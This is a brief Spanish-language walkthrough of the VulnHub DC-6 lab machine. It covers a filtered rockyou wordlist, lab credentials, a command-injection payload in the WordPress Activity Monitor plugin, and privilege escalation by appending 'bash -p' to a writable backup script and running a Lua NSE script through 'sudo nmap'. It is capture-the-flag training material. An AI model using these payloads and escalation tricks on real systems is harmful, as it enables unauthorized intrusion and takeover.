DC-6 - VulnHub

// CLASSIFIED OPERATION REPORT //

DC-6 - VulnHub

Plugin WordPress con command injection, privesc encadenado por script sudo y sudo nmap.

VULNHUB MEDIUM 11 de julio de 2024
#WordPress#Command Injection#sudo nmap#Privilege Escalation#Linux
Realizado en entornos autorizados. Solo con fines educativos.

DC-6 es una cadena de privesc encadenada muy didáctica: cada usuario abre la puerta al siguiente hasta root.

Servicios: 22 SSH · 80 WordPress (“wordy”)

1. Fuerza bruta guiada

CMSMap enumera los usuarios. El autor sugiere un diccionario reducido con grep sobre rockyou:

grep k01 /usr/share/wordlists/rockyou.txt > passwords
# resultado: mark : helpdesk01

2. Command injection en Activity Monitor

El plugin Activity Monitor es vulnerable a command injection en la función lookup (127.0.0.1;<cmd>), lo que da shell como www-data. En wp-config.php y things-to-do.txt aparece graham:GSo7isUM1D4 (SSH).

3. Escalada encadenada → root

graham (grupo devs) puede editar un backup.sh que corre como jens:

echo 'bash -p' >> backup.sh   # → shell como jens

jens tiene sudo nmap (NOPASSWD). Vía GTFOBins:

echo 'os.execute("/bin/bash")' > shell.nse
sudo nmap --script=shell.nse   # → root

Conceptos aplicados

  • Diccionario filtrado con grep.
  • Command injection en plugin de WordPress.
  • Privesc encadenado por script sudo escribible + sudo nmap --script.